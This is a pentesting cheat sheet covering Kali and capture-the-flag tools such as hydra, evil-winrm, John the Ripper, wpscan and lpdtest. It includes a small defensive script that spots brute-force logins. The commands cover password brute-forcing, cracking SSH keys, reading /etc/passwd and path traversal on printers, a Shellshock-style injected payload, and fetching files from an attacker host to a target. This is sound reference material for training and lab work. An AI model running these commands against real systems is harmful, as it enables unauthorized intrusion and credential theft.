Hacking Tools

descriptions of tools that may or may not be default in Kali

more at apt-secure.ca

adb (android debug tool)


#adb connect <IP>:5555

#adb shell

apktool

tool for reverse engineering android apk files

#apktool d -f -r filename.apk

base64 decode

Decode a base64 string back to readable text (any trailing = padding belongs inside the quotes)

#echo "<base64 string>" | base64 --decode

creating base64

#echo "string" | base64


BurpSuite

verbose details here link

DIRB

Web content scanner that looks for existing (and/or hidden) web objects. Its primary function is launching a dictionary-based attack against a web server and analysing the responses

Usage: #dirb http://zyz.htb -r -z 10

Dirbuster

GUI for Dirb. Very slick. Especially useful for

Usage: Open dirbuster application

-set number of threads

-set target including http:// or https://

-set wordlist

-set file extension

davtest

tool that tests whether files can be uploaded to a WebDAV-enabled (and possibly vulnerable) web server

Usage: #davtest -url http://<ip>

evil-winrm

Windows Remote Management (WinRM) shell

  • #gem install evil-winrm

  • #evil-winrm -i <IP> -u <username> -p '<password>'

    • available commands when successful

    • upload/download/services/menu

use evil-winrm with acquired certificate and private key

  • #evil-winrm -i <IP> -S -c cert.crt -k priv.key -p -u

    • you will have to enter the password for the key (likely you have identified it or made your own)


fcrackzip

a free, fast zip password cracker

Usage: #fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <filename>.zip

-u = unzip

-D = Dictionary

-p = password string

finger-user-enum.pl

enumerates user names via the finger service

Usage: #./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76

getcap

Examine file capabilities. Displays the name and capabilities of each specified file

Usage: #getcap -r /

Usage: #getcap -r / 2>/dev/null (same scan, with permission-denied errors hidden)

gobuster

similar to DIRB, a directory brute forcer

  • you will need to install it

    • #apt-get install gobuster

usage:

"common.txt" at the location you see here was a special download, you can use whatever wordlist you want.

hydra

password brute-forcing tool

basic usage

  • #hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP> -t 4 <service>

Brute force login on website

#hydra -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&:invalid"

(-s expects a port number; with no -s the http-post-form module defaults to port 80. The form spec is path:POST body:failure string, so "invalid" is the text that marks a failed login.)
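Seen from the defending side of the http-post-form entry above, here is a small detector (an added example, not part of the original cheat sheet) that flags a source sending many login POSTs to one path inside a short window, which is the footprint a run like that leaves in the web server access log. The log lines are constructed, and the login path, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format lines (not real traffic):
# six rapid POSTs from 10.0.0.5, two spaced-out POSTs from 10.0.0.9, one GET.
SAMPLE_LOG = "\n".join(
    ['10.0.0.5 - - [01/Jan/2024:10:00:%02d +0000] "POST / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (Hydra)"' % s
     for s in range(0, 12, 2)]
    + ['10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
       '10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "POST / HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
       '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0"']
)

# Enough of the combined log format to get source, time, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, method, path) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"]

def login_post_times(log_text, login_path="/"):
    """Group the timestamps of POSTs to the login path by source IP."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == login_path:
            per_ip[rec[0]].append(rec[1])
    return per_ip

def suspicious_sources(log_text, login_path="/", threshold=5, window_seconds=60):
    """IPs that sent at least `threshold` login POSTs within any `window_seconds` span.
    Status codes are deliberately ignored: a form that answers 200 to both good and
    bad logins (the "invalid" marker case above) gives no signal there, volume does."""
    flagged = []
    for ip, times in login_post_times(log_text, login_path).items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                flagged.append(ip)
                break
    return sorted(flagged)

if __name__ == "__main__":
    print(suspicious_sources(SAMPLE_LOG))  # ['10.0.0.5']
```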

impacket:

Installation:

#sudo apt-get install python3-pip

#sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Navigate to /opt/impacket

#sudo python3 ./setup.py install

John the Ripper

Basic usage

  • #john --wordlist=/usr/share/wordlists/rockyou.txt <file_name>

get a crackable hash from a .pfx file

  • #pfx2john file.pfx > [output_file_name]

    • then go back to basic JTR usage and crack the hash


kubeletctl

Kubeletctl is a command line tool that implements the kubelet's API.

typically port 10250

can discover through https://<IP>:10250

github repo

another good resource

installation:

#wget https://github.com/cyberark/kubeletctl/releases/download/v1.7/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl

check pods

  • #kubeletctl pods -s <IP>

check running pods

  • #kubeletctl runningpods -s <IP>

ldapsearch

an LDAP search tool (great resource)

check for null credentials

  • #ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

lpdprint.py

github

Line Printer Daemon (LPD) runs on port 515/TCP. It is possible to send files, get files and even navigate the OS

basic usage

  • #lpdprint.py hostname filename

  • #lpdtest.py hostname get /etc/passwd

  • #lpdtest.py hostname put ../../etc/passwd

  • #lpdtest.py hostname rm /some/file/on/printer

  • #lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'

  • #lpdtest.py hostname mail lpdtest@mailhost.local

netcat

the Swiss army knife of networking

basic file transfer

receiver (works with images/zips/etc.)

  • #nc -nlvp 4444 > file.txt

sender

  • #nc <receiver_IP> 4444 < stuff_you_want_to_send.txt

nmblookup

NetBIOS over TCP/IP client used to lookup NetBIOS names


  • #nmblookup -A <IP>


nuclei

Nuclei is a vulnerability scanning tool developed by projectdiscovery that helps find security issues automatically based on simple YAML-based templates. This tool is highly customizable and helps in identifying vulnerabilities by scanning numerous protocols such as HTTP, DNS, TCP etc.

INITIAL SETUP

  • #apt-get install nuclei

  • #nuclei -u http://<IP> 130


openssl

cryptography toolkit implementing ssl v2/v3 and TLS v1 network protocols and related crypto standards (reference)

(see also on this page ssh2john)

Extract private key from pfx file

  • #openssl pkcs12 -in [yourfile.pfx] -nocerts -out [priv.key]

Extract the certificate

  • #openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [cert.crt]

Decrypt private key

  • #openssl rsa -in [priv.key] -out [decrypt_priv.key]

Python Webserver

An amazingly quick way to launch a web server so you can transfer files to the target fast!

Run the below command from the "attack" machine. Launch from the directory that contains the file you are wanting. (linpeas.sh, winpeas.sh etc.)

  • #python3 -m http.server 5050

Then, from the target, fetch the file

  • #wget http://<attack_ip>:5050/linpeas.sh

pureFTPd

Used for transferring data between kali and target

INITIAL SETUP

On Kali

  • #apt-get install pure-ftpd

create ftp user

  • #useradd -g ftpgroup -d /dev/null -s /etc ftpuser

  • #pure-pw useradd jonny -u ftpuser -d /ftphome

  • #pure-pw mkdb

  • #cd /etc/pure-ftpd/auth/

  • #ln -s ../conf/PureDB 60pdb

    • (the symlink is created inside /etc/pure-ftpd/auth; note lowercase -s)

  • #mkdir -p /ftphome

  • #chown -R ftpuser:ftpgroup /ftphome/

  • #systemctl restart pure-ftpd

Check Status

#systemctl status pure-ftpd

USAGE

From target

#ftp <kali IP>

login and download


rpcinfo

typically the service rpcbind is found on port 111

tool makes an RPC call to an RPC server and reports what it finds

basic usage

#rpcinfo <IP>


RSACTFTOOL

download

cracking weak rsa with provided .pub key

#RsaCtfTool.py --publickey <key.pub> --uncipherfile <flag.enc>


rpcclient

basic usage: check for null sessions

#rpcclient -U "" -N <IP>


SecLists

this is a user-made archive of a TON of wordlists, scripts and various tools. It's insane

download like so.

#wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip

#unzip SecList.zip

#rm -f SecList.zip


sublist3r

tool designed to enumerate subdomains of websites using OSINT

basic usage:

#sublist3r -d domain.com


sherlock

Tool for enumerating social media for user names

You need to install it

Usage: #sherlock <username>

(it returns a lot!)

SimpleHTTPServer (Python)

Used for file transfers between attacker and target. Typically there is something on the target you want to plant

Usage: Attacker Machine: #python2 -m SimpleHTTPServer <port> (Python 2 only; on Python 3 use the http.server entry above)

Usage: Target: #wget http://<attackerIP>:<port>/<desired_file>

ssh2john

you have acquired an SSH private key (e.g. id_rsa) file. You need to convert this file to a hash that john can crack

  • #ssh2john <filename that is rsa> > hash_output

  • #john --wordlist=/usr/share/wordlists/rockyou.txt hash_output

steghide

basic embedding:

  • #steghide embed -ef secretphrase.txt -cf image.jpeg

basic extraction:

  • #steghide extract -sf image.jpeg

    • enter password

    • output saved "pass.txt"

swaks

swiss army knife for smtp. Main site here

script located here


tcpdump

Dumps network traffic. Used for analysing traffic.

power usage link

wafw00f

Identify and fingerprint Web Application Firewall products

sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions. If that is not successful, it sends a number of HTTP requests and uses simple logic to deduce which WAF it is

basic usage:

  • #wafw00f http://<IP>

wpscan

scanner used for gathering information (vulns) on WordPress sites

basic usage

#wpscan --url http://backdoor.htb

enumerate users

#wpscan --url http://backdoor.htb --enumerate u

deeper scan

#wpscan --url http://<IP> -e ap,t,tt,u

      • ap = all plugins

      • t = themes

      • tt = timthumbs

      • u = users

Brute Force Plugin discovery

#wpscan --url http://backdoor.htb --plugins-detection aggressive -e ap



zipinfo

Gives you the properties of the zip file

basic usage:

  • #zipinfo -v <filename>.zip